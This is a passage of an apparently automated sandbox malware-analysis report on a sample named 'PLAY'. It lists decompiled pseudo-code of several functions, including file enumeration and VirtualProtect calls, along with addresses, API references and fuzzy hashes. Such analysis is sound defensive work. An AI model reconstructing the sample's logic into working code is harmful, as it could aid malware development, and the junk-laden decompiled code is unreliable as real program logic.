										 *0xb0b114 =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E00AFA4EC(__eflags))) = 0x16;
							goto L5;
						}
					}
					E00AFC2CE(_t81);
					return _t86;
				} else {
					return 0;
				}
			}






















          0x00afcd0a
          0x00afcd12
          0x00afcd15
          0x00afcd18
          0x00afcd20
          0x00afcd2b
          0x00afcd2e
          0x00afcd34
          0x00afcd3a
          0x00afcd47
          0x00afcd49
          0x00afcd4d
          0x00afcd4f
          0x00afcd7f
          0x00afcd7f
          0x00afcd51
          0x00afcd5e
          0x00afcd64
          0x00afcd67
          0x00afcd6c
          0x00afcd70
          0x00afcd72
          0x00afcd8f
          0x00afcd93
          0x00afcd95
          0x00afcd95
          0x00afcda0
          0x00afcda4
          0x00afcda5
          0x00afcda7
          0x00afcdaa
          0x00afcdb1
          0x00afcdb6
          0x00afcdbb
          0x00afcdb1
          0x00afcdbc
          0x00afcdc2
          0x00afcdc7
          0x00afcdc9
          0x00afcdcc
          0x00afcdcf
          0x00afcdd6
          0x00afcdd8
          0x00afcddf
          0x00afcde4
          0x00afcdef
          0x00afcdf2
          0x00afcdf3
          0x00afcdf6
          0x00afcdfc
          0x00afce00
          0x00afce04
          0x00afce05
          0x00afce0a
          0x00afce0e
          0x00afce19
          0x00afce19
          0x00afce0e
          0x00afcddf
          0x00afcd74
          0x00afcd79
          0x00000000
          0x00afcd79
          0x00afcd72
          0x00afcd82
          0x00afcd8e
          0x00afcd36
          0x00afcd39
          0x00afcd39

          APIs
            • Part of subcall function 00AFCAB3: GetOEMCP.KERNEL32(00000000,00AFCD25,00AFFA61,00000000,00000016,00000016,00000000,?,00AFFA61), ref: 00AFCADE
          • _free.LIBCMT ref: 00AFCD82
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free
          • String ID:
          • API String ID: 269201875-0
          • Opcode ID: ed3cbd0a0f1fb7604fdce858deb699d0f670f98bce29a565987be523f504fc2f
          • Instruction ID: 12426e5a9d2cf9e10f57251595674285505ac1fd47c3a6b4ab9503dccc1f9e49
          • Opcode Fuzzy Hash: ed3cbd0a0f1fb7604fdce858deb699d0f670f98bce29a565987be523f504fc2f
          • Instruction Fuzzy Hash: D431907290020DAFDB11EFE9CA41AEE7BB5EF44364F110069FA119B2A2EB719D50CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE980 Relevance: 3.1, APIs: 2, Instructions: 69memoryCOMMON
          Download Yara Rule
          APIs
          • SetVolumeMountPointWStub.KERNEL32(?,?), ref: 00AEE9A3
          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AEEA43
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: MountPointProtectStubVirtualVolume
          • String ID:
          • API String ID: 1405303151-0
          • Opcode ID: c89cbf3cd944bace6602c649d0ce1e0cbb8e11971fc235c971e00f65f26ba10c
          • Instruction ID: e68182651072684fa98c798b158a2e3b64acfaa58f28ce76aaf07491f37819ed
          • Opcode Fuzzy Hash: c89cbf3cd944bace6602c649d0ce1e0cbb8e11971fc235c971e00f65f26ba10c
          • Instruction Fuzzy Hash: 3D216A72A081C5ABCF12DFB9DC80698BFA1FF52310F4400EDE588DE262D7368515CB41
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFE327 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
          Download Yara Rule
          C-Code - Quality: 50%
          			E00AFE327(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E00AFE01F();
				if(_t22 == 0) {
					return LCMapStringW(E00AFE384(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0xb04104(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}





          0x00afe332
          0x00afe336
          0x00000000
          0x00afe379
          0x00afe355
          0x00afe35b
          0x00000000

          APIs
          • LCMapStringEx.KERNELBASE(?,00AFBA8E,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00AFE35B
          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00AFBA8E,?,?,00000000,?,00000000), ref: 00AFE379
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: String
          • String ID:
          • API String ID: 2568140703-0
          • Opcode ID: 65829230a9771bad45efd0b26ec4f7f804eac388a1bf07bd63b8b102cad4cba2
          • Instruction ID: 511a1d1d3f168b09c7598958a62c2d9badac0f1074a72135810fba9cf575f63f
          • Opcode Fuzzy Hash: 65829230a9771bad45efd0b26ec4f7f804eac388a1bf07bd63b8b102cad4cba2
          • Instruction Fuzzy Hash: 79F0283650015EBBCF12AF90DD099EE3F66AF587A0B054120BB196A131CB76C971AB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF3415 Relevance: 2.6, APIs: 2, Instructions: 79sleepCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLastSleep
          • String ID:
          • API String ID: 1458359878-0
          • Opcode ID: 4e25408ba7d712630b3a221b266e4e8148c5ad67c10b70617f6d8f050bf1ae01
          • Instruction ID: 65a320f8a28f001845ff158af4cc88def3b13adc7705a7f83002a52b91d22634
          • Opcode Fuzzy Hash: 4e25408ba7d712630b3a221b266e4e8148c5ad67c10b70617f6d8f050bf1ae01
          • Instruction Fuzzy Hash: A131EB72C0028A8FCF10DFA4D8816EDBBB5EF25325F0801A5E956A7292E7318A198B51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEBBEB Relevance: 1.7, APIs: 1, Instructions: 181COMMON
          Download Yara Rule
          C-Code - Quality: 16%
          			E00AEBBEB(void* __eax, void* __ebx, void* __edi, void* __esi) {
				signed int _t10;
				intOrPtr* _t18;

				asm("lahf");
				_push(_t18);
				asm("sbb eax, 0x92170e88");
				asm("jecxz 0x17");
				asm("fst dword [ebx-0x30]");
				asm("movsb");
				_t10 = 0xa6fb3bb8 *  *(__esi - 0x340784f1);
				 *_t18 =  *_t18 + 0x48;
				return _t10;
			}





          0x00aebbeb
          0x00aebbf6
          0x00aebbf7
          0x00aebc06
          0x00aebc08
          0x00aebc0b
          0x00aebc0c
          0x00aebc12
          0x00aebc16

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _wcsstr
          • String ID:
          • API String ID: 1512112989-0
          • Opcode ID: 84f2337d38a6314596d1da4f9e00217699c462229facb62490354b5cbd7d1dca
          • Instruction ID: 259580723157ab0b7a3174abe4ad4bcc57db89933db08c7c9d4eb59640a6892e
          • Opcode Fuzzy Hash: 84f2337d38a6314596d1da4f9e00217699c462229facb62490354b5cbd7d1dca
          • Instruction Fuzzy Hash: 03517D71D2428D8ACB109FA6DC512FFB775EFA9310F10416AED05AB391FB348945CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEBB4D Relevance: 1.6, APIs: 1, Instructions: 118fileCOMMON
          Download Yara Rule
          C-Code - Quality: 49%
          			E00AEBB4D(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t58;
				intOrPtr* _t61;
				signed short _t64;
				signed int _t67;
				signed int _t68;
				intOrPtr _t84;
				void* _t85;
				intOrPtr* _t90;
				intOrPtr* _t93;
				signed int _t97;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t111;
				intOrPtr _t113;
				signed int _t114;
				void* _t116;
				signed int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				void* _t125;
				void* _t126;

				_t120 = _t119 - 1;
				asm("aaa");
				E00AEDEC0(__ebx,  *[ds:eax+ebp+0x22] * 0x36 - 0x8bd2d98b, __edi, __esi);
				_t116 =  *(_t118 - 0x3f0);
				_t58 = FindNextFileW(_t116, _t118 - 0x3ac); // executed
				_t84 =  *((intOrPtr*)(_t118 - 0x3d4));
				if(_t58 != 0) {
					_push(_t118 - 0x20);
					E00AED7D0(_t84, 0xb0b940, 4, __edi, _t116);
					_t113 =  *((intOrPtr*)(_t118 - 0x3e4));
					_t90 = _t118 - 0x20;
					_t122 = _t120 - 8 + 0xc;
					_t61 = _t118 - 0x380;
					while(1) {
						_t104 =  *_t61;
						if(_t104 !=  *_t90) {
							break;
						}
						if(_t104 == 0) {
							L6:
							_t117 = 0;
						} else {
							_t111 =  *((intOrPtr*)(_t61 + 2));
							if(_t111 !=  *((intOrPtr*)(_t90 + 2))) {
								break;
							} else {
								_t61 = _t61 + 4;
								_t90 = _t90 + 4;
								if(_t111 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						 *((intOrPtr*)(_t118 - 0x3bc)) =  *((intOrPtr*)(_t118 - 0x3bc)) + 0xfffe;
						asm("xorps xmm0, xmm0");
						 *((intOrPtr*)(_t118 - 0x3c4)) =  *((intOrPtr*)(_t118 - 0x3c4)) + 0xfffe;
						 *((short*)(_t118 - 0x3e4)) = _t113 + 4;
						_t85 = _t84 - 3;
						_t64 =  *(_t118 - 0x3e0) + 0x33fc;
						asm("movlpd [ebp-0x20], xmm0");
						_t114 = _t64 & 0x0000ffff;
						 *(_t118 - 0x3e0) = _t64;
						_push(_t118 - 0x14);
						E00AED7D0(_t85, 0xb0c980, 6, _t114, _t117);
						_t124 = _t122 - 8 + 0xc;
						_t93 = _t118 - 0x14;
						_t67 = _t118 - 0x380;
						while(1) {
							_t106 =  *_t67;
							if(_t106 !=  *_t93) {
								break;
							}
							if(_t106 == 0) {
								L13:
								_t68 = 0;
							} else {
								_t106 =  *((intOrPtr*)(_t67 + 2));
								if(_t106 !=  *((intOrPtr*)(_t93 + 2))) {
									break;
								} else {
									_t67 = _t67 + 4;
									_t93 = _t93 + 4;
									if(_t106 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							asm("xorps xmm0, xmm0");
							 *((short*)(_t118 - 0x3b4)) =  *((intOrPtr*)(_t118 - 0x3b4)) +  *((intOrPtr*)(_t118 - 0x3c8));
							asm("movq [ebp-0x14], xmm0");
							 *((intOrPtr*)(_t118 - 0xc)) = 0;
							if(_t117 == 0 || _t68 == 0) {
								L27:
								_t125 = _t124 - 0x10;
								if(0x4a0d <= 0x4087) {
									_t125 = _t125 + 0xab;
								}
								_t124 = _t125 + 0x10;
								L32();
								asm("o16 int1");
								asm("movsb");
								_t114 = _t114 & _t124;
								asm("wait");
								asm("sbb [ebp-0x76], edi");
								if(_t114 != 0) {
									goto L26;
								}
								asm("invalid");
								asm("sti");
								_push(0x6f66ecb8);
								asm("adc dl, bl");
								 *_t124 =  *_t124 + 0x3d;
								return 0x3d240483;
							} else {
								 *((short*)(_t118 - 0x3c4)) = ( *(_t118 - 0x3ad) & 0x000000ff) + 1;
								_t74 = _t85 - 1;
								 *((intOrPtr*)(_t118 - 0x3e8)) = _t85 - 1;
								if(( *(_t118 - 0x3ac) & 0x00000010) == 0) {
									if(E00AEAE60(_t85, _t118 - 0x380, _t114, _t117) != 0 ||  *((intOrPtr*)(_t118 - 0x38c)) <= 5) {
										_t97 =  *(_t118 - 0x3cc);
									} else {
										_push(E00AEAFF0(_t85, _t118 - 0x380, _t106, _t114, _t117));
										_push( *((intOrPtr*)(_t118 + 8)));
										_push( *((intOrPtr*)(_t118 - 0x38c)));
										_push( *((intOrPtr*)(_t118 - 0x390)));
										E00AF6E20(_t77, _t85,  *((intOrPtr*)(_t118 - 0x3b8)), _t118 - 0x380, _t114, _t117); // executed
										_t124 = _t124 + 0x10;
										_t97 = ( *(_t118 - 0x3b2) & 0x000000ff) * _t114;
										 *((short*)(_t118 - 0x3b4)) =  *((intOrPtr*)(_t118 - 0x3d0));
										 *((intOrPtr*)(_t118 - 0x3e8)) = 0;
										 *(_t118 - 0x3cc) = _t97;
									}
									 *((intOrPtr*)(_t118 - 0x3bc)) = _t97 - 1;
									L26:
									 *((intOrPtr*)(_t85 + 0xdba10ec)) =  *((intOrPtr*)(_t85 + 0xdba10ec)) + 1;
									goto L27;
								} else {
									_t126 = _t124 - 0x10;
									if(0xc4e == 0x1885) {
										_t126 = _t126 + 0x36;
									}
									E00AEB836(_t74);
									asm("repe adc [eax+0x39393a8], edx");
									return 0xbf;
								}
							}
							goto L34;
						}
						asm("sbb eax, eax");
						_t68 = _t67 | 0x00000001;
						goto L15;
					}
					asm("sbb esi, esi");
					_t117 = _t116 | 0x00000001;
					goto L8;
				} else {
					__ecx = __esi; // executed
					E00AEE1C0(); // executed
					__ecx =  *(__ebp - 8);
					__eax = 1;
					_pop(__edi);
					_pop(__esi);
					__ecx =  *(__ebp - 8) ^ __ebp;
					_pop(__ebx);
					__eax = E00AF7B30( *(__ebp - 8) ^ __ebp);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
				L34:
			}



























          0x00aebb55
          0x00aebb61
          0x00aebb6d
          0x00aebb72
          0x00aebb80
          0x00aebb82
          0x00aebb8a
          0x00aeb6c8
          0x00aeb6d1
          0x00aeb6d6
          0x00aeb6dc
          0x00aeb6df
          0x00aeb6e2
          0x00aeb6e8
          0x00aeb6e8
          0x00aeb6ee
          0x00000000
          0x00000000
          0x00aeb6f3
          0x00aeb70a
          0x00aeb70a
          0x00aeb6f5
          0x00aeb6f5
          0x00aeb6fd
          0x00000000
          0x00aeb6ff
          0x00aeb6ff
          0x00aeb702
          0x00aeb708
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00aeb708
          0x00aeb6fd
          0x00aeb713
          0x00aeb71b
          0x00aeb722
          0x00aeb725
          0x00aeb731
          0x00aeb743
          0x00aeb746
          0x00aeb74b
          0x00aeb750
          0x00aeb753
          0x00aeb75d
          0x00aeb761
          0x00aeb766
          0x00aeb769
          0x00aeb76c
          0x00aeb772
          0x00aeb772
          0x00aeb778
          0x00000000
          0x00000000
          0x00aeb77d
          0x00aeb794
          0x00aeb794
          0x00aeb77f
          0x00aeb77f
          0x00aeb787
          0x00000000
          0x00aeb789
          0x00aeb789
          0x00aeb78c
          0x00aeb792
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00aeb792
          0x00aeb787
          0x00aeb79d
          0x00aeb7a4
          0x00aeb7ae
          0x00aeb7b5
          0x00aeb7ba
          0x00aeb7c3
          0x00aebb0c
          0x00aebb0c
          0x00aebb1a
          0x00aebb1c
          0x00aebb1c
          0x00aebb22
          0x00aebb25
          0x00aebb2a
          0x00aebb2c
          0x00aebb33
          0x00aebb35
          0x00aebb36
          0x00aebb39
          0x00000000
          0x00000000
          0x00aebb3b
          0x00aebb3d
          0x00aebb3e
          0x00aebb43
          0x00aebb46
          0x00aebb4a
          0x00aeb7d1
          0x00aeb7e3
          0x00aeb7ea
          0x00aeb7ed
          0x00aeb7f3
          0x00aeba9a
          0x00aebafd
          0x00aebaa5
          0x00aebabc
          0x00aebabd
          0x00aebac0
          0x00aebac6
          0x00aebacc
          0x00aebad8
          0x00aebae1
          0x00aebae4
          0x00aebaeb
          0x00aebaf5
          0x00aebaf5
          0x00aebb06
          0x00aebb0b
          0x00aebb0b
          0x00000000
          0x00aeb7f9
          0x00aeb7f9
          0x00aeb808
          0x00aeb80a
          0x00aeb80a
          0x00aeb810
          0x00aeb817
          0x00aeb820
          0x00aeb820
          0x00aeb7f3
          0x00000000
          0x00aeb7c3
          0x00aeb798
          0x00aeb79a
          0x00000000
          0x00aeb79a
          0x00aeb70e
          0x00aeb710
          0x00000000
          0x00aebb90
          0x00aebb90
          0x00aebb92
          0x00aebb97
          0x00aebb9a
          0x00aebb9f
          0x00aebba0
          0x00aebba1
          0x00aebba3
          0x00aebba4
          0x00aebba9
          0x00aebbab
          0x00aebbac
          0x00aebbac
          0x00000000

          APIs
          • FindNextFileW.KERNELBASE(?,?), ref: 00AEBB80
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileFindNext
          • String ID:
          • API String ID: 2029273394-0
          • Opcode ID: ce847c2be48818653b1376a17685dce45508374e94df85a27c9729efdf0ae7a2
          • Instruction ID: 0843d4a42f7073d0a5e1253c599ce6a8893cb5b0c726197df5babcb3c622b4e8
          • Opcode Fuzzy Hash: ce847c2be48818653b1376a17685dce45508374e94df85a27c9729efdf0ae7a2
          • Instruction Fuzzy Hash: D941F121D102998BDB26EB61C9657FEB375EF64304F0042E9D809A7284FB319F84CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEBC1A Relevance: 1.6, APIs: 1, Instructions: 117COMMON
          Download Yara Rule
          C-Code - Quality: 51%
          			E00AEBC1A(void* __eax, intOrPtr __ebx, signed int __ecx, signed int __esi, void* __fp0) {
				void* __ebp;
				signed int _t45;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed char _t77;
				intOrPtr _t78;
				intOrPtr _t85;
				intOrPtr* _t88;
				signed int _t90;
				signed int _t96;
				void* _t98;
				void* _t99;
				intOrPtr* _t105;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;
				intOrPtr _t113;
				signed int _t116;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t124;
				void* _t127;
				intOrPtr* _t128;
				signed int _t130;
				void* _t145;

				_t145 = __fp0;
				_t110 = __esi;
				_t75 = __ebx;
				asm("cmpsb");
				asm("into");
				ss = _t116;
				asm("scasb");
				_push(_t119);
				asm("into");
				 *__esi =  *__esi ^ __ecx;
				_t6 = __ecx %  *(__ebx + 0xf + __esi * 8);
				_t130 = _t6;
				_t45 = __ecx /  *(__ebx + 0xf + __esi * 8);
				_t96 = _t6;
				if(_t130 > 0) {
					_t45 = 0;
					_t75 = 0x67d;
				}
				if(_t130 < 0) {
					 *_t45 =  *_t45 + _t45;
				}
				_t105 =  *((intOrPtr*)(_t116 - 0x28));
				asm("movq [ebp-0x50], xmm0");
				asm("movq xmm0, [0xb090a8]");
				asm("movq [ebp-0x6c], xmm0");
				asm("movq xmm0, [0xb090b8]");
				asm("movq [ebp-0x38], xmm0");
				asm("movq xmm0, [0xb090c4]");
				 *((intOrPtr*)(_t116 - 0x2c)) = _t75;
				 *((short*)(_t116 - 0x30)) = 0;
				asm("movq [ebp-0x5c], xmm0");
				_t111 = E00AEAD90(0, _t75, _t105, _t96, _t105, _t110, _t145);
				_push(_t116 - 0x1c);
				E00AED7D0(_t75, 0xb0b95c, 0xc, _t105, _t111);
				_t50 =  *(_t116 - 0x4c) & 0x0000ffff;
				_t121 = _t119 - 8 + 0xc;
				if(_t50 <= 0x73) {
					 *((char*)(_t116 - 0x1d)) =  *((intOrPtr*)(_t116 - 0x30));
				} else {
					 *((intOrPtr*)(_t116 - 0x2c)) = _t75 + _t50 + 0xffffff8d;
					 *((char*)(_t116 - 0x1d)) =  *((intOrPtr*)(_t116 - 0x30));
				}
				_t52 = _t116 - 0x1c;
				while(1) {
					_t85 =  *_t111;
					if(_t85 !=  *_t52) {
						break;
					}
					if(_t85 == 0) {
						L12:
						_t53 = 0;
					} else {
						_t85 =  *((intOrPtr*)(_t111 + 2));
						if(_t85 !=  *((intOrPtr*)(_t52 + 2))) {
							break;
						} else {
							_t111 = _t111 + 4;
							_t52 = _t52 + 4;
							if(_t85 != 0) {
								continue;
							} else {
								goto L12;
							}
						}
					}
					L14:
					if(_t53 == 0) {
						L30:
						return E00AF7B30( *(_t116 - 4) ^ _t116);
					} else {
						_push(_t116 - 0x1c);
						_push(_t105);
						_t57 = E00AF874B(_t85);
						_t123 = _t121 + 8;
						if(_t57 != 0) {
							goto L30;
						} else {
							if( *(_t116 - 0x4c) != 0xf8) {
								_t113 =  *((intOrPtr*)(_t116 - 0x50));
							} else {
								_t113 = 3;
							}
							_t88 = _t105;
							 *((intOrPtr*)(_t116 - 0x24)) = _t113;
							_t98 = _t88 + 2;
							do {
								_t59 =  *_t88;
								_t88 = _t88 + 2;
							} while (_t59 != 0);
							_t77 =  *((intOrPtr*)(_t116 - 0x38));
							_t90 = _t88 - _t98 >> 1;
							_t99 = 0x17a;
							_t107 = 0x35de;
							do {
								_t99 = _t99 + 1;
								_t107 = _t107 * 0x000069f3 & 0x0000ffff;
								_t62 = _t77 & 0x000000ff;
								_t77 = (_t77 & 0x000000ff) * 0x63;
							} while (_t99 < 0x17b);
							_t108 = 0xd + _t90 * 2;
							_t63 = E00AEE070(_t62, _t90, 0xd + _t90 * 2, _t90, 4); // executed
							_t78 = _t63;
							_t124 = _t123 + 8;
							 *((intOrPtr*)(_t116 - 0x3c)) = _t78;
							if(_t78 != 0) {
								 *((intOrPtr*)(_t116 - 0x40)) = 0x48;
								E00AFA532(_t78, _t108,  *((intOrPtr*)(_t116 - 0x28)));
								_t67 = E00AFA596(_t78, _t108, _t116 - 0x1c);
								asm("xorps xmm0, xmm0");
								asm("movups [ebp-0x1c], xmm0");
								asm("movq [ebp-0xc], xmm0");
								_t127 = _t124 + 0x18 - 4;
								if(0x3b1e == 0x54c2) {
									_t127 = _t127 + 0x13b;
								}
								_t128 = _t127 + 4;
								L29();
								 *_t67 =  *_t67 + _t67;
								 *(_t67 - 0x69) =  *(_t67 - 0x69) ^ _t116;
								asm("das");
								asm("fldenv [edi]");
								asm("movsb");
								asm("out 0xc8, al");
								_t69 = _t67 ^ 0x2d2b5de3;
								asm("invalid");
								 *_t128 =  *_t128 + 0x28;
								return _t69;
							} else {
								return E00AF7B30( *(_t116 - 4) ^ _t116);
							}
						}
					}
				}
				asm("sbb eax, eax");
				_t53 = _t52 | 0x00000001;
				goto L14;
			}




































          0x00aebc1a
          0x00aebc1a
          0x00aebc1a
          0x00aebc1b
          0x00aebc1c
          0x00aebc1d
          0x00aebc1f
          0x00aebc20
          0x00aebc21
          0x00aebc22
          0x00aebc24
          0x00aebc24
          0x00aebc24
          0x00aebc24
          0x00aebc28
          0x00aebc2c
          0x00aebc2e
          0x00aebc2e
          0x00aebc2f
          0x00aebc31
          0x00aebc33
          0x00aebc3a
          0x00aebc3f
          0x00aebc44
          0x00aebc4c
          0x00aebc51
          0x00aebc59
          0x00aebc5e
          0x00aebc66
          0x00aebc69
          0x00aebc6d
          0x00aebc77
          0x00aebc86
          0x00aebc8a
          0x00aebc8f
          0x00aebc93
          0x00aebc99
          0x00aebcb1
          0x00aebc9b
          0x00aebca6
          0x00aebca9
          0x00aebca9
          0x00aebcb4
          0x00aebcb7
          0x00aebcb7
          0x00aebcbd
          0x00000000
          0x00000000
          0x00aebcc2
          0x00aebcd9
          0x00aebcd9
          0x00aebcc4
          0x00aebcc4
          0x00aebccc
          0x00000000
          0x00aebcce
          0x00aebcce
          0x00aebcd1
          0x00aebcd7
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00aebcd7
          0x00aebccc
          0x00aebce2
          0x00aebce4
          0x00aebe67
          0x00aebe7c
          0x00aebcea
          0x00aebced
          0x00aebcee
          0x00aebcef
          0x00aebcf4
          0x00aebcf9
          0x00000000
          0x00aebcff
          0x00aebd08
          0x00aebd11
          0x00aebd0a
          0x00aebd0a
          0x00aebd0a
          0x00aebd15
          0x00aebd17
          0x00aebd1a
          0x00aebd20
          0x00aebd20
          0x00aebd23
          0x00aebd26
          0x00aebd2b
          0x00aebd35
          0x00aebd37
          0x00aebd3c
          0x00aebd40
          0x00aebd46
          0x00aebd47
          0x00aebd4a
          0x00aebd4d
          0x00aebd50
          0x00aebd58
          0x00aebd64
          0x00aebd69
          0x00aebd6b
          0x00aebd6e
          0x00aebd73
          0x00aebd93
          0x00aebd96
          0x00aebda4
          0x00aebda9
          0x00aebdaf
          0x00aebdb3
          0x00aebdb8
          0x00aebdc7
          0x00aebdc9
          0x00aebdc9
          0x00aebdcf
          0x00aebdd2
          0x00aebdd5
          0x00aebdd7
          0x00aebdda
          0x00aebddb
          0x00aebddd
          0x00aebddf
          0x00aebde8
          0x00aebdef
          0x00aebdf3
          0x00aebdf7
          0x00aebd75
          0x00aebd88
          0x00aebd88
          0x00aebd73
          0x00aebcf9
          0x00aebce4
          0x00aebcdd
          0x00aebcdf
          0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _wcsstr
          • String ID:
          • API String ID: 1512112989-0
          • Opcode ID: bf046b483044622a307bd9d8a257cc6c48fb8bf3cb895c499eaca39369e9f01b
          • Instruction ID: 9e52c9d564f30d4c3b0205cd411c4f901ec24762e7d0792bab6ae8c943965d9f
          • Opcode Fuzzy Hash: bf046b483044622a307bd9d8a257cc6c48fb8bf3cb895c499eaca39369e9f01b
          • Instruction Fuzzy Hash: E3412535D1428986CB209FAADC512FFB7B5EF98310F50412AEC06AB291FB348941C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE496F Relevance: 1.6, APIs: 1, Instructions: 114fileCOMMON
          Download Yara Rule
          C-Code - Quality: 46%
          			E00AE496F(void* __eax, char __ebx, void* __ecx, void* __esi, void* __eflags) {
				int _t30;
				intOrPtr _t32;
				signed int _t33;
				signed char _t45;
				signed int _t46;
				signed char _t49;
				signed char _t54;
				signed int _t57;
				signed char _t61;
				void* _t65;
				intOrPtr _t71;
				void* _t72;
				signed int _t73;
				void* _t78;
				signed int _t81;
				void* _t84;
				signed int* _t85;
				void* _t86;
				signed int* _t87;
